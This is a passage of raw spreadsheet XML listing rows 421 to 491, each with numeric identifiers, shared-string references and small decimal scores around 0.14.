      <c r="F421" s="2">
        <v>0.1435185185185185</v>
      </c>
    </row>
    <row r="422" ht="15.75" customHeight="1">
      <c r="A422" s="1">
        <v>33611.0</v>
      </c>
      <c r="B422" s="2">
        <v>8342153.0</v>
      </c>
      <c r="C422" s="2" t="s">
        <v>367</v>
      </c>
      <c r="D422" s="2">
        <v>1.0</v>
      </c>
      <c r="E422" s="3" t="s">
        <v>6</v>
      </c>
      <c r="F422" s="2">
        <v>0.1435185185185185</v>
      </c>
    </row>
    <row r="423" ht="15.75" customHeight="1">
      <c r="A423" s="1">
        <v>14064.0</v>
      </c>
      <c r="B423" s="2">
        <v>3.7587909E7</v>
      </c>
      <c r="C423" s="2" t="s">
        <v>368</v>
      </c>
      <c r="D423" s="2">
        <v>1.0</v>
      </c>
      <c r="E423" s="3" t="s">
        <v>6</v>
      </c>
      <c r="F423" s="2">
        <v>0.1432748538011697</v>
      </c>
    </row>
    <row r="424" ht="15.75" customHeight="1">
      <c r="A424" s="1">
        <v>21697.0</v>
      </c>
      <c r="B424" s="2">
        <v>2.5224213E7</v>
      </c>
      <c r="C424" s="2" t="s">
        <v>369</v>
      </c>
      <c r="D424" s="2">
        <v>1.0</v>
      </c>
      <c r="E424" s="3" t="s">
        <v>6</v>
      </c>
      <c r="F424" s="2">
        <v>0.1432748538011697</v>
      </c>
    </row>
    <row r="425" ht="15.75" customHeight="1">
      <c r="A425" s="1">
        <v>23348.0</v>
      </c>
      <c r="B425" s="2">
        <v>5.4814746E7</v>
      </c>
      <c r="C425" s="2" t="s">
        <v>370</v>
      </c>
      <c r="D425" s="2">
        <v>1.0</v>
      </c>
      <c r="E425" s="3" t="s">
        <v>6</v>
      </c>
      <c r="F425" s="2">
        <v>0.1432748538011697</v>
      </c>
    </row>
    <row r="426" ht="15.75" customHeight="1">
      <c r="A426" s="1">
        <v>23792.0</v>
      </c>
      <c r="B426" s="2">
        <v>7727712.0</v>
      </c>
      <c r="C426" s="2" t="s">
        <v>371</v>
      </c>
      <c r="D426" s="2">
        <v>1.0</v>
      </c>
      <c r="E426" s="3" t="s">
        <v>6</v>
      </c>
      <c r="F426" s="2">
        <v>0.1432748538011697</v>
      </c>
    </row>
    <row r="427" ht="15.75" customHeight="1">
      <c r="A427" s="1">
        <v>23915.0</v>
      </c>
      <c r="B427" s="2">
        <v>8531131.0</v>
      </c>
      <c r="C427" s="2" t="s">
        <v>357</v>
      </c>
      <c r="D427" s="2">
        <v>1.0</v>
      </c>
      <c r="E427" s="3" t="s">
        <v>6</v>
      </c>
      <c r="F427" s="2">
        <v>0.1432748538011697</v>
      </c>
    </row>
    <row r="428" ht="15.75" customHeight="1">
      <c r="A428" s="1">
        <v>25147.0</v>
      </c>
      <c r="B428" s="2">
        <v>1.3053143E7</v>
      </c>
      <c r="C428" s="2" t="s">
        <v>372</v>
      </c>
      <c r="D428" s="2">
        <v>1.0</v>
      </c>
      <c r="E428" s="3" t="s">
        <v>6</v>
      </c>
      <c r="F428" s="2">
        <v>0.1432748538011697</v>
      </c>
    </row>
    <row r="429" ht="15.75" customHeight="1">
      <c r="A429" s="1">
        <v>32205.0</v>
      </c>
      <c r="B429" s="2">
        <v>5.4814745E7</v>
      </c>
      <c r="C429" s="2" t="s">
        <v>370</v>
      </c>
      <c r="D429" s="2">
        <v>1.0</v>
      </c>
      <c r="E429" s="3" t="s">
        <v>6</v>
      </c>
      <c r="F429" s="2">
        <v>0.1432748538011697</v>
      </c>
    </row>
    <row r="430" ht="15.75" customHeight="1">
      <c r="A430" s="1">
        <v>32564.0</v>
      </c>
      <c r="B430" s="2">
        <v>5769083.0</v>
      </c>
      <c r="C430" s="2" t="s">
        <v>373</v>
      </c>
      <c r="D430" s="2">
        <v>1.0</v>
      </c>
      <c r="E430" s="3" t="s">
        <v>6</v>
      </c>
      <c r="F430" s="2">
        <v>0.1432748538011697</v>
      </c>
    </row>
    <row r="431" ht="15.75" customHeight="1">
      <c r="A431" s="1">
        <v>32565.0</v>
      </c>
      <c r="B431" s="2">
        <v>5769083.0</v>
      </c>
      <c r="C431" s="2" t="s">
        <v>374</v>
      </c>
      <c r="D431" s="2">
        <v>1.0</v>
      </c>
      <c r="E431" s="3" t="s">
        <v>6</v>
      </c>
      <c r="F431" s="2">
        <v>0.1432748538011697</v>
      </c>
    </row>
    <row r="432" ht="15.75" customHeight="1">
      <c r="A432" s="1">
        <v>18416.0</v>
      </c>
      <c r="B432" s="2">
        <v>5.269047E7</v>
      </c>
      <c r="C432" s="2" t="s">
        <v>375</v>
      </c>
      <c r="D432" s="2">
        <v>1.0</v>
      </c>
      <c r="E432" s="3" t="s">
        <v>6</v>
      </c>
      <c r="F432" s="2">
        <v>0.1432748538011696</v>
      </c>
    </row>
    <row r="433" ht="15.75" customHeight="1">
      <c r="A433" s="1">
        <v>20298.0</v>
      </c>
      <c r="B433" s="2">
        <v>1.1301178E7</v>
      </c>
      <c r="C433" s="2" t="s">
        <v>376</v>
      </c>
      <c r="D433" s="2">
        <v>1.0</v>
      </c>
      <c r="E433" s="3" t="s">
        <v>6</v>
      </c>
      <c r="F433" s="2">
        <v>0.1432748538011696</v>
      </c>
    </row>
    <row r="434" ht="15.75" customHeight="1">
      <c r="A434" s="1">
        <v>20351.0</v>
      </c>
      <c r="B434" s="2">
        <v>1.165074E7</v>
      </c>
      <c r="C434" s="2" t="s">
        <v>377</v>
      </c>
      <c r="D434" s="2">
        <v>1.0</v>
      </c>
      <c r="E434" s="3" t="s">
        <v>6</v>
      </c>
      <c r="F434" s="2">
        <v>0.1432748538011696</v>
      </c>
    </row>
    <row r="435" ht="15.75" customHeight="1">
      <c r="A435" s="1">
        <v>21793.0</v>
      </c>
      <c r="B435" s="2">
        <v>2.6615477E7</v>
      </c>
      <c r="C435" s="2" t="s">
        <v>378</v>
      </c>
      <c r="D435" s="2">
        <v>1.0</v>
      </c>
      <c r="E435" s="3" t="s">
        <v>6</v>
      </c>
      <c r="F435" s="2">
        <v>0.1432748538011696</v>
      </c>
    </row>
    <row r="436" ht="15.75" customHeight="1">
      <c r="A436" s="1">
        <v>23116.0</v>
      </c>
      <c r="B436" s="2">
        <v>5124516.0</v>
      </c>
      <c r="C436" s="2" t="s">
        <v>379</v>
      </c>
      <c r="D436" s="2">
        <v>1.0</v>
      </c>
      <c r="E436" s="3" t="s">
        <v>6</v>
      </c>
      <c r="F436" s="2">
        <v>0.1432748538011696</v>
      </c>
    </row>
    <row r="437" ht="15.75" customHeight="1">
      <c r="A437" s="1">
        <v>23384.0</v>
      </c>
      <c r="B437" s="2">
        <v>5.5612087E7</v>
      </c>
      <c r="C437" s="2" t="s">
        <v>380</v>
      </c>
      <c r="D437" s="2">
        <v>1.0</v>
      </c>
      <c r="E437" s="3" t="s">
        <v>6</v>
      </c>
      <c r="F437" s="2">
        <v>0.1432748538011696</v>
      </c>
    </row>
    <row r="438" ht="15.75" customHeight="1">
      <c r="A438" s="1">
        <v>23758.0</v>
      </c>
      <c r="B438" s="2">
        <v>7491062.0</v>
      </c>
      <c r="C438" s="2" t="s">
        <v>381</v>
      </c>
      <c r="D438" s="2">
        <v>1.0</v>
      </c>
      <c r="E438" s="3" t="s">
        <v>6</v>
      </c>
      <c r="F438" s="2">
        <v>0.1432748538011696</v>
      </c>
    </row>
    <row r="439" ht="15.75" customHeight="1">
      <c r="A439" s="1">
        <v>29540.0</v>
      </c>
      <c r="B439" s="2">
        <v>3.283781E7</v>
      </c>
      <c r="C439" s="2" t="s">
        <v>382</v>
      </c>
      <c r="D439" s="2">
        <v>1.0</v>
      </c>
      <c r="E439" s="3" t="s">
        <v>6</v>
      </c>
      <c r="F439" s="2">
        <v>0.1432748538011696</v>
      </c>
    </row>
    <row r="440" ht="15.75" customHeight="1">
      <c r="A440" s="1">
        <v>30804.0</v>
      </c>
      <c r="B440" s="2">
        <v>4.5219883E7</v>
      </c>
      <c r="C440" s="2" t="s">
        <v>383</v>
      </c>
      <c r="D440" s="2">
        <v>1.0</v>
      </c>
      <c r="E440" s="3" t="s">
        <v>6</v>
      </c>
      <c r="F440" s="2">
        <v>0.1432748538011696</v>
      </c>
    </row>
    <row r="441" ht="15.75" customHeight="1">
      <c r="A441" s="1">
        <v>31256.0</v>
      </c>
      <c r="B441" s="2">
        <v>4942565.0</v>
      </c>
      <c r="C441" s="2" t="s">
        <v>384</v>
      </c>
      <c r="D441" s="2">
        <v>1.0</v>
      </c>
      <c r="E441" s="3" t="s">
        <v>6</v>
      </c>
      <c r="F441" s="2">
        <v>0.1432748538011696</v>
      </c>
    </row>
    <row r="442" ht="15.75" customHeight="1">
      <c r="A442" s="1">
        <v>31343.0</v>
      </c>
      <c r="B442" s="2">
        <v>4983515.0</v>
      </c>
      <c r="C442" s="2" t="s">
        <v>385</v>
      </c>
      <c r="D442" s="2">
        <v>1.0</v>
      </c>
      <c r="E442" s="3" t="s">
        <v>6</v>
      </c>
      <c r="F442" s="2">
        <v>0.1432748538011696</v>
      </c>
    </row>
    <row r="443" ht="15.75" customHeight="1">
      <c r="A443" s="1">
        <v>32218.0</v>
      </c>
      <c r="B443" s="2">
        <v>5488862.0</v>
      </c>
      <c r="C443" s="2" t="s">
        <v>386</v>
      </c>
      <c r="D443" s="2">
        <v>1.0</v>
      </c>
      <c r="E443" s="3" t="s">
        <v>6</v>
      </c>
      <c r="F443" s="2">
        <v>0.1432748538011696</v>
      </c>
    </row>
    <row r="444" ht="15.75" customHeight="1">
      <c r="A444" s="1">
        <v>33406.0</v>
      </c>
      <c r="B444" s="2">
        <v>7727711.0</v>
      </c>
      <c r="C444" s="2" t="s">
        <v>387</v>
      </c>
      <c r="D444" s="2">
        <v>1.0</v>
      </c>
      <c r="E444" s="3" t="s">
        <v>6</v>
      </c>
      <c r="F444" s="2">
        <v>0.1432748538011696</v>
      </c>
    </row>
    <row r="445" ht="15.75" customHeight="1">
      <c r="A445" s="1">
        <v>8893.0</v>
      </c>
      <c r="B445" s="2">
        <v>5.4786883E7</v>
      </c>
      <c r="C445" s="2" t="s">
        <v>388</v>
      </c>
      <c r="D445" s="2">
        <v>1.0</v>
      </c>
      <c r="E445" s="3" t="s">
        <v>6</v>
      </c>
      <c r="F445" s="2">
        <v>0.1432291666666667</v>
      </c>
    </row>
    <row r="446" ht="15.75" customHeight="1">
      <c r="A446" s="1">
        <v>20492.0</v>
      </c>
      <c r="B446" s="2">
        <v>1.28682E7</v>
      </c>
      <c r="C446" s="2" t="s">
        <v>389</v>
      </c>
      <c r="D446" s="2">
        <v>1.0</v>
      </c>
      <c r="E446" s="3" t="s">
        <v>6</v>
      </c>
      <c r="F446" s="2">
        <v>0.1432291666666667</v>
      </c>
    </row>
    <row r="447" ht="15.75" customHeight="1">
      <c r="A447" s="1">
        <v>22002.0</v>
      </c>
      <c r="B447" s="2">
        <v>2.9720702E7</v>
      </c>
      <c r="C447" s="2" t="s">
        <v>390</v>
      </c>
      <c r="D447" s="2">
        <v>1.0</v>
      </c>
      <c r="E447" s="3" t="s">
        <v>6</v>
      </c>
      <c r="F447" s="2">
        <v>0.1432291666666667</v>
      </c>
    </row>
    <row r="448" ht="15.75" customHeight="1">
      <c r="A448" s="1">
        <v>25059.0</v>
      </c>
      <c r="B448" s="2">
        <v>1.2868199E7</v>
      </c>
      <c r="C448" s="2" t="s">
        <v>389</v>
      </c>
      <c r="D448" s="2">
        <v>1.0</v>
      </c>
      <c r="E448" s="3" t="s">
        <v>6</v>
      </c>
      <c r="F448" s="2">
        <v>0.1432291666666667</v>
      </c>
    </row>
    <row r="449" ht="15.75" customHeight="1">
      <c r="A449" s="1">
        <v>27061.0</v>
      </c>
      <c r="B449" s="2">
        <v>2.0378125E7</v>
      </c>
      <c r="C449" s="2" t="s">
        <v>391</v>
      </c>
      <c r="D449" s="2">
        <v>1.0</v>
      </c>
      <c r="E449" s="3" t="s">
        <v>6</v>
      </c>
      <c r="F449" s="2">
        <v>0.1432291666666667</v>
      </c>
    </row>
    <row r="450" ht="15.75" customHeight="1">
      <c r="A450" s="1">
        <v>32507.0</v>
      </c>
      <c r="B450" s="2">
        <v>5715360.0</v>
      </c>
      <c r="C450" s="2" t="s">
        <v>392</v>
      </c>
      <c r="D450" s="2">
        <v>1.0</v>
      </c>
      <c r="E450" s="3" t="s">
        <v>6</v>
      </c>
      <c r="F450" s="2">
        <v>0.1432291666666667</v>
      </c>
    </row>
    <row r="451" ht="15.75" customHeight="1">
      <c r="A451" s="1">
        <v>32812.0</v>
      </c>
      <c r="B451" s="2">
        <v>6185503.0</v>
      </c>
      <c r="C451" s="2" t="s">
        <v>393</v>
      </c>
      <c r="D451" s="2">
        <v>1.0</v>
      </c>
      <c r="E451" s="3" t="s">
        <v>6</v>
      </c>
      <c r="F451" s="2">
        <v>0.1432291666666667</v>
      </c>
    </row>
    <row r="452" ht="15.75" customHeight="1">
      <c r="A452" s="1">
        <v>21420.0</v>
      </c>
      <c r="B452" s="2">
        <v>2.2067602E7</v>
      </c>
      <c r="C452" s="2" t="s">
        <v>394</v>
      </c>
      <c r="D452" s="2">
        <v>1.0</v>
      </c>
      <c r="E452" s="3" t="s">
        <v>6</v>
      </c>
      <c r="F452" s="2">
        <v>0.1430041152263375</v>
      </c>
    </row>
    <row r="453" ht="15.75" customHeight="1">
      <c r="A453" s="1">
        <v>21112.0</v>
      </c>
      <c r="B453" s="2">
        <v>1.8232684E7</v>
      </c>
      <c r="C453" s="2" t="s">
        <v>395</v>
      </c>
      <c r="D453" s="2">
        <v>1.0</v>
      </c>
      <c r="E453" s="3" t="s">
        <v>6</v>
      </c>
      <c r="F453" s="2">
        <v>0.1429872495446267</v>
      </c>
    </row>
    <row r="454" ht="15.75" customHeight="1">
      <c r="A454" s="1">
        <v>32273.0</v>
      </c>
      <c r="B454" s="2">
        <v>5.5310796E7</v>
      </c>
      <c r="C454" s="2" t="s">
        <v>396</v>
      </c>
      <c r="D454" s="2">
        <v>1.0</v>
      </c>
      <c r="E454" s="3" t="s">
        <v>6</v>
      </c>
      <c r="F454" s="2">
        <v>0.1429872495446266</v>
      </c>
    </row>
    <row r="455" ht="15.75" customHeight="1">
      <c r="A455" s="1">
        <v>32853.0</v>
      </c>
      <c r="B455" s="2">
        <v>6257231.0</v>
      </c>
      <c r="C455" s="2" t="s">
        <v>397</v>
      </c>
      <c r="D455" s="2">
        <v>1.0</v>
      </c>
      <c r="E455" s="3" t="s">
        <v>6</v>
      </c>
      <c r="F455" s="2">
        <v>0.142764857881137</v>
      </c>
    </row>
    <row r="456" ht="15.75" customHeight="1">
      <c r="A456" s="1">
        <v>22717.0</v>
      </c>
      <c r="B456" s="2">
        <v>4.3410783E7</v>
      </c>
      <c r="C456" s="2" t="s">
        <v>398</v>
      </c>
      <c r="D456" s="2">
        <v>1.0</v>
      </c>
      <c r="E456" s="3" t="s">
        <v>6</v>
      </c>
      <c r="F456" s="2">
        <v>0.1427350427350428</v>
      </c>
    </row>
    <row r="457" ht="15.75" customHeight="1">
      <c r="A457" s="1">
        <v>29067.0</v>
      </c>
      <c r="B457" s="2">
        <v>3.0297051E7</v>
      </c>
      <c r="C457" s="2" t="s">
        <v>399</v>
      </c>
      <c r="D457" s="2">
        <v>1.0</v>
      </c>
      <c r="E457" s="3" t="s">
        <v>6</v>
      </c>
      <c r="F457" s="2">
        <v>0.14247311827957</v>
      </c>
    </row>
    <row r="458" ht="15.75" customHeight="1">
      <c r="A458" s="1">
        <v>25629.0</v>
      </c>
      <c r="B458" s="2">
        <v>1.4460434E7</v>
      </c>
      <c r="C458" s="2" t="s">
        <v>400</v>
      </c>
      <c r="D458" s="2">
        <v>1.0</v>
      </c>
      <c r="E458" s="3" t="s">
        <v>6</v>
      </c>
      <c r="F458" s="2">
        <v>0.1424242424242424</v>
      </c>
    </row>
    <row r="459" ht="15.75" customHeight="1">
      <c r="A459" s="1">
        <v>30149.0</v>
      </c>
      <c r="B459" s="2">
        <v>3.7042415E7</v>
      </c>
      <c r="C459" s="2" t="s">
        <v>401</v>
      </c>
      <c r="D459" s="2">
        <v>1.0</v>
      </c>
      <c r="E459" s="3" t="s">
        <v>6</v>
      </c>
      <c r="F459" s="2">
        <v>0.1422558922558923</v>
      </c>
    </row>
    <row r="460" ht="15.75" customHeight="1">
      <c r="A460" s="1">
        <v>21242.0</v>
      </c>
      <c r="B460" s="2">
        <v>1.979887E7</v>
      </c>
      <c r="C460" s="2" t="s">
        <v>402</v>
      </c>
      <c r="D460" s="2">
        <v>1.0</v>
      </c>
      <c r="E460" s="3" t="s">
        <v>6</v>
      </c>
      <c r="F460" s="2">
        <v>0.1421845574387948</v>
      </c>
    </row>
    <row r="461" ht="15.75" customHeight="1">
      <c r="A461" s="1">
        <v>24359.0</v>
      </c>
      <c r="B461" s="2">
        <v>1.0739806E7</v>
      </c>
      <c r="C461" s="2" t="s">
        <v>403</v>
      </c>
      <c r="D461" s="2">
        <v>1.0</v>
      </c>
      <c r="E461" s="3" t="s">
        <v>6</v>
      </c>
      <c r="F461" s="2">
        <v>0.1421845574387948</v>
      </c>
    </row>
    <row r="462" ht="15.75" customHeight="1">
      <c r="A462" s="1">
        <v>25597.0</v>
      </c>
      <c r="B462" s="2">
        <v>1.4377581E7</v>
      </c>
      <c r="C462" s="2" t="s">
        <v>404</v>
      </c>
      <c r="D462" s="2">
        <v>1.0</v>
      </c>
      <c r="E462" s="3" t="s">
        <v>6</v>
      </c>
      <c r="F462" s="2">
        <v>0.1421845574387948</v>
      </c>
    </row>
    <row r="463" ht="15.75" customHeight="1">
      <c r="A463" s="1">
        <v>29794.0</v>
      </c>
      <c r="B463" s="2">
        <v>3.5113688E7</v>
      </c>
      <c r="C463" s="2" t="s">
        <v>405</v>
      </c>
      <c r="D463" s="2">
        <v>1.0</v>
      </c>
      <c r="E463" s="3" t="s">
        <v>6</v>
      </c>
      <c r="F463" s="2">
        <v>0.1421845574387948</v>
      </c>
    </row>
    <row r="464" ht="15.75" customHeight="1">
      <c r="A464" s="1">
        <v>32161.0</v>
      </c>
      <c r="B464" s="2">
        <v>5.4393582E7</v>
      </c>
      <c r="C464" s="2" t="s">
        <v>406</v>
      </c>
      <c r="D464" s="2">
        <v>1.0</v>
      </c>
      <c r="E464" s="3" t="s">
        <v>6</v>
      </c>
      <c r="F464" s="2">
        <v>0.1421845574387948</v>
      </c>
    </row>
    <row r="465" ht="15.75" customHeight="1">
      <c r="A465" s="1">
        <v>28770.0</v>
      </c>
      <c r="B465" s="2">
        <v>2.8418212E7</v>
      </c>
      <c r="C465" s="2" t="s">
        <v>352</v>
      </c>
      <c r="D465" s="2">
        <v>1.0</v>
      </c>
      <c r="E465" s="3" t="s">
        <v>6</v>
      </c>
      <c r="F465" s="2">
        <v>0.1419753086419754</v>
      </c>
    </row>
    <row r="466" ht="15.75" customHeight="1">
      <c r="A466" s="1">
        <v>33828.0</v>
      </c>
      <c r="B466" s="2">
        <v>8937484.0</v>
      </c>
      <c r="C466" s="2" t="s">
        <v>407</v>
      </c>
      <c r="D466" s="2">
        <v>1.0</v>
      </c>
      <c r="E466" s="3" t="s">
        <v>6</v>
      </c>
      <c r="F466" s="2">
        <v>0.1419753086419754</v>
      </c>
    </row>
    <row r="467" ht="15.75" customHeight="1">
      <c r="A467" s="1">
        <v>20375.0</v>
      </c>
      <c r="B467" s="2">
        <v>1.1836648E7</v>
      </c>
      <c r="C467" s="2" t="s">
        <v>408</v>
      </c>
      <c r="D467" s="2">
        <v>1.0</v>
      </c>
      <c r="E467" s="3" t="s">
        <v>6</v>
      </c>
      <c r="F467" s="2">
        <v>0.1413255360623782</v>
      </c>
    </row>
    <row r="468" ht="15.75" customHeight="1">
      <c r="A468" s="1">
        <v>22411.0</v>
      </c>
      <c r="B468" s="2">
        <v>3.5931657E7</v>
      </c>
      <c r="C468" s="2" t="s">
        <v>409</v>
      </c>
      <c r="D468" s="2">
        <v>1.0</v>
      </c>
      <c r="E468" s="3" t="s">
        <v>6</v>
      </c>
      <c r="F468" s="2">
        <v>0.1413255360623782</v>
      </c>
    </row>
    <row r="469" ht="15.75" customHeight="1">
      <c r="A469" s="1">
        <v>24074.0</v>
      </c>
      <c r="B469" s="2">
        <v>9674852.0</v>
      </c>
      <c r="C469" s="2" t="s">
        <v>410</v>
      </c>
      <c r="D469" s="2">
        <v>1.0</v>
      </c>
      <c r="E469" s="3" t="s">
        <v>6</v>
      </c>
      <c r="F469" s="2">
        <v>0.1413255360623782</v>
      </c>
    </row>
    <row r="470" ht="15.75" customHeight="1">
      <c r="A470" s="1">
        <v>33299.0</v>
      </c>
      <c r="B470" s="2">
        <v>7491061.0</v>
      </c>
      <c r="C470" s="2" t="s">
        <v>381</v>
      </c>
      <c r="D470" s="2">
        <v>1.0</v>
      </c>
      <c r="E470" s="3" t="s">
        <v>6</v>
      </c>
      <c r="F470" s="2">
        <v>0.1413255360623782</v>
      </c>
    </row>
    <row r="471" ht="15.75" customHeight="1">
      <c r="A471" s="1">
        <v>34066.0</v>
      </c>
      <c r="B471" s="2">
        <v>9627707.0</v>
      </c>
      <c r="C471" s="2" t="s">
        <v>411</v>
      </c>
      <c r="D471" s="2">
        <v>1.0</v>
      </c>
      <c r="E471" s="3" t="s">
        <v>6</v>
      </c>
      <c r="F471" s="2">
        <v>0.1413255360623782</v>
      </c>
    </row>
    <row r="472" ht="15.75" customHeight="1">
      <c r="A472" s="1">
        <v>29238.0</v>
      </c>
      <c r="B472" s="2">
        <v>3.0839651E7</v>
      </c>
      <c r="C472" s="2" t="s">
        <v>412</v>
      </c>
      <c r="D472" s="2">
        <v>1.0</v>
      </c>
      <c r="E472" s="3" t="s">
        <v>6</v>
      </c>
      <c r="F472" s="2">
        <v>0.1411657559198543</v>
      </c>
    </row>
    <row r="473" ht="15.75" customHeight="1">
      <c r="A473" s="1">
        <v>25496.0</v>
      </c>
      <c r="B473" s="2">
        <v>1.4084173E7</v>
      </c>
      <c r="C473" s="2" t="s">
        <v>413</v>
      </c>
      <c r="D473" s="2">
        <v>1.0</v>
      </c>
      <c r="E473" s="3" t="s">
        <v>6</v>
      </c>
      <c r="F473" s="2">
        <v>0.1410256410256411</v>
      </c>
    </row>
    <row r="474" ht="15.75" customHeight="1">
      <c r="A474" s="1">
        <v>27875.0</v>
      </c>
      <c r="B474" s="2">
        <v>2.354899E7</v>
      </c>
      <c r="C474" s="2" t="s">
        <v>414</v>
      </c>
      <c r="D474" s="2">
        <v>1.0</v>
      </c>
      <c r="E474" s="3" t="s">
        <v>6</v>
      </c>
      <c r="F474" s="2">
        <v>0.1410256410256411</v>
      </c>
    </row>
    <row r="475" ht="15.75" customHeight="1">
      <c r="A475" s="1">
        <v>2668.0</v>
      </c>
      <c r="B475" s="2">
        <v>3.4734719E7</v>
      </c>
      <c r="C475" s="2" t="s">
        <v>415</v>
      </c>
      <c r="D475" s="2">
        <v>1.0</v>
      </c>
      <c r="E475" s="3" t="s">
        <v>6</v>
      </c>
      <c r="F475" s="2">
        <v>0.1408045977011495</v>
      </c>
    </row>
    <row r="476" ht="15.75" customHeight="1">
      <c r="A476" s="1">
        <v>20223.0</v>
      </c>
      <c r="B476" s="2">
        <v>1.0777092E7</v>
      </c>
      <c r="C476" s="2" t="s">
        <v>416</v>
      </c>
      <c r="D476" s="2">
        <v>1.0</v>
      </c>
      <c r="E476" s="3" t="s">
        <v>6</v>
      </c>
      <c r="F476" s="2">
        <v>0.1408045977011495</v>
      </c>
    </row>
    <row r="477" ht="15.75" customHeight="1">
      <c r="A477" s="1">
        <v>21271.0</v>
      </c>
      <c r="B477" s="2">
        <v>2.0143509E7</v>
      </c>
      <c r="C477" s="2" t="s">
        <v>417</v>
      </c>
      <c r="D477" s="2">
        <v>1.0</v>
      </c>
      <c r="E477" s="3" t="s">
        <v>6</v>
      </c>
      <c r="F477" s="2">
        <v>0.1408045977011495</v>
      </c>
    </row>
    <row r="478" ht="15.75" customHeight="1">
      <c r="A478" s="1">
        <v>21514.0</v>
      </c>
      <c r="B478" s="2">
        <v>2.3185593E7</v>
      </c>
      <c r="C478" s="2" t="s">
        <v>418</v>
      </c>
      <c r="D478" s="2">
        <v>1.0</v>
      </c>
      <c r="E478" s="3" t="s">
        <v>6</v>
      </c>
      <c r="F478" s="2">
        <v>0.1408045977011495</v>
      </c>
    </row>
    <row r="479" ht="15.75" customHeight="1">
      <c r="A479" s="1">
        <v>21721.0</v>
      </c>
      <c r="B479" s="2">
        <v>2.5602719E7</v>
      </c>
      <c r="C479" s="2" t="s">
        <v>419</v>
      </c>
      <c r="D479" s="2">
        <v>1.0</v>
      </c>
      <c r="E479" s="3" t="s">
        <v>6</v>
      </c>
      <c r="F479" s="2">
        <v>0.1408045977011495</v>
      </c>
    </row>
    <row r="480" ht="15.75" customHeight="1">
      <c r="A480" s="1">
        <v>21819.0</v>
      </c>
      <c r="B480" s="2">
        <v>2.6923562E7</v>
      </c>
      <c r="C480" s="2" t="s">
        <v>420</v>
      </c>
      <c r="D480" s="2">
        <v>1.0</v>
      </c>
      <c r="E480" s="3" t="s">
        <v>6</v>
      </c>
      <c r="F480" s="2">
        <v>0.1408045977011495</v>
      </c>
    </row>
    <row r="481" ht="15.75" customHeight="1">
      <c r="A481" s="1">
        <v>22097.0</v>
      </c>
      <c r="B481" s="2">
        <v>3.0811513E7</v>
      </c>
      <c r="C481" s="2" t="s">
        <v>421</v>
      </c>
      <c r="D481" s="2">
        <v>1.0</v>
      </c>
      <c r="E481" s="3" t="s">
        <v>6</v>
      </c>
      <c r="F481" s="2">
        <v>0.1408045977011495</v>
      </c>
    </row>
    <row r="482" ht="15.75" customHeight="1">
      <c r="A482" s="1">
        <v>22215.0</v>
      </c>
      <c r="B482" s="2">
        <v>3.2185398E7</v>
      </c>
      <c r="C482" s="2" t="s">
        <v>422</v>
      </c>
      <c r="D482" s="2">
        <v>1.0</v>
      </c>
      <c r="E482" s="3" t="s">
        <v>6</v>
      </c>
      <c r="F482" s="2">
        <v>0.1408045977011495</v>
      </c>
    </row>
    <row r="483" ht="15.75" customHeight="1">
      <c r="A483" s="1">
        <v>22672.0</v>
      </c>
      <c r="B483" s="2">
        <v>4.1638407E7</v>
      </c>
      <c r="C483" s="2" t="s">
        <v>423</v>
      </c>
      <c r="D483" s="2">
        <v>1.0</v>
      </c>
      <c r="E483" s="3" t="s">
        <v>6</v>
      </c>
      <c r="F483" s="2">
        <v>0.1408045977011495</v>
      </c>
    </row>
    <row r="484" ht="15.75" customHeight="1">
      <c r="A484" s="1">
        <v>23061.0</v>
      </c>
      <c r="B484" s="2">
        <v>5.0351896E7</v>
      </c>
      <c r="C484" s="2" t="s">
        <v>424</v>
      </c>
      <c r="D484" s="2">
        <v>1.0</v>
      </c>
      <c r="E484" s="3" t="s">
        <v>6</v>
      </c>
      <c r="F484" s="2">
        <v>0.1408045977011495</v>
      </c>
    </row>
    <row r="485" ht="15.75" customHeight="1">
      <c r="A485" s="1">
        <v>23402.0</v>
      </c>
      <c r="B485" s="2">
        <v>5.5863614E7</v>
      </c>
      <c r="C485" s="2" t="s">
        <v>425</v>
      </c>
      <c r="D485" s="2">
        <v>1.0</v>
      </c>
      <c r="E485" s="3" t="s">
        <v>6</v>
      </c>
      <c r="F485" s="2">
        <v>0.1408045977011495</v>
      </c>
    </row>
    <row r="486" ht="15.75" customHeight="1">
      <c r="A486" s="1">
        <v>23806.0</v>
      </c>
      <c r="B486" s="2">
        <v>7846152.0</v>
      </c>
      <c r="C486" s="2" t="s">
        <v>426</v>
      </c>
      <c r="D486" s="2">
        <v>1.0</v>
      </c>
      <c r="E486" s="3" t="s">
        <v>6</v>
      </c>
      <c r="F486" s="2">
        <v>0.1408045977011495</v>
      </c>
    </row>
    <row r="487" ht="15.75" customHeight="1">
      <c r="A487" s="1">
        <v>24017.0</v>
      </c>
      <c r="B487" s="2">
        <v>9326156.0</v>
      </c>
      <c r="C487" s="2" t="s">
        <v>427</v>
      </c>
      <c r="D487" s="2">
        <v>1.0</v>
      </c>
      <c r="E487" s="3" t="s">
        <v>6</v>
      </c>
      <c r="F487" s="2">
        <v>0.1408045977011495</v>
      </c>
    </row>
    <row r="488" ht="15.75" customHeight="1">
      <c r="A488" s="1">
        <v>24466.0</v>
      </c>
      <c r="B488" s="2">
        <v>1.0954508E7</v>
      </c>
      <c r="C488" s="2" t="s">
        <v>428</v>
      </c>
      <c r="D488" s="2">
        <v>1.0</v>
      </c>
      <c r="E488" s="3" t="s">
        <v>6</v>
      </c>
      <c r="F488" s="2">
        <v>0.1408045977011495</v>
      </c>
    </row>
    <row r="489" ht="15.75" customHeight="1">
      <c r="A489" s="1">
        <v>24985.0</v>
      </c>
      <c r="B489" s="2">
        <v>1.2685998E7</v>
      </c>
      <c r="C489" s="2" t="s">
        <v>429</v>
      </c>
      <c r="D489" s="2">
        <v>1.0</v>
      </c>
      <c r="E489" s="3" t="s">
        <v>6</v>
      </c>
      <c r="F489" s="2">
        <v>0.1408045977011495</v>
      </c>
    </row>
    <row r="490" ht="15.75" customHeight="1">
      <c r="A490" s="1">
        <v>25650.0</v>
      </c>
      <c r="B490" s="2">
        <v>1.452297E7</v>
      </c>
      <c r="C490" s="2" t="s">
        <v>430</v>
      </c>
      <c r="D490" s="2">
        <v>1.0</v>
      </c>
      <c r="E490" s="3" t="s">
        <v>6</v>
      </c>
      <c r="F490" s="2">
        <v>0.1408045977011495</v>
      </c>
    </row>
    <row r="491" ht="15.75" customHeight="1">
      <c r="A491" s="1">
        <v>26813.0</v>
      </c>
      <c r="B491" s="2">
        <v>1.8740457E7</v>
      </c>
      <c r="C491" s="2" t="s">
        <v>431</v>
      </c>
      <c r="D491" s="2">
        <v>1.0</v>
      </c>
      <c r="E491" s="3" t="s">
        <v>6</v>
